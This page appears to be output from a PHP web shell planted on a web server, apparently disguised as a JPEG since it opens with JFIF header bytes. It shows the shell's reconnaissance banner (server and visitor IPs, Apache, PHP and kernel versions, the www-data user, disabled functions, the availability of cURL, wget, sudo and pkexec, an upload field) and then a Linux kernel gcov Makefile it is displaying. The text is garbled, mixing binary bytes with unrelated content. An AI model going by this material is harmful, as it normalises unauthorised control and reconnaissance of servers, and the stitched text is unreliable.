????JFIF??x?x????'
Server IP : 79.136.114.73 / Your IP : 18.118.162.243 Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64 User : www-data ( 33) PHP Version : 5.5.9-1ubuntu4.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /lib/modules/3.13.0-35-generic/build/kernel/gcov/ |
Upload File : |
ccflags-y := -DSRCTREE='"$(srctree)"' -DOBJTREE='"$(objtree)"' # if-lt # Usage VAR := $(call if-lt, $(a), $(b)) # Returns 1 if (a < b) if-lt = $(shell [ $(1) -lt $(2) ] && echo 1) ifeq ($(CONFIG_GCOV_FORMAT_3_4),y) cc-ver := 0304 else ifeq ($(CONFIG_GCOV_FORMAT_4_7),y) cc-ver := 0407 else # Use cc-version if available, otherwise set 0 # # scripts/Kbuild.include, which contains cc-version function, is not included # during make clean "make -f scripts/Makefile.clean obj=kernel/gcov" # Meaning cc-ver is empty causing if-lt test to fail with # "/bin/sh: line 0: [: -lt: unary operator expected" error mesage. # This has no affect on the clean phase, but the error message could be # confusing/annoying. So this dummy workaround sets cc-ver to zero if cc-version # is not available. We can probably move if-lt to Kbuild.include, so it's also # not defined during clean or to include Kbuild.include in # scripts/Makefile.clean. But the following workaround seems least invasive. cc-ver := $(if $(call cc-version),$(call cc-version),0) endif obj-$(CONFIG_GCOV_KERNEL) := base.o fs.o ifeq ($(call if-lt, $(cc-ver), 0407),1) obj-$(CONFIG_GCOV_KERNEL) += gcc_3_4.o else obj-$(CONFIG_GCOV_KERNEL) += gcc_4_7.o endif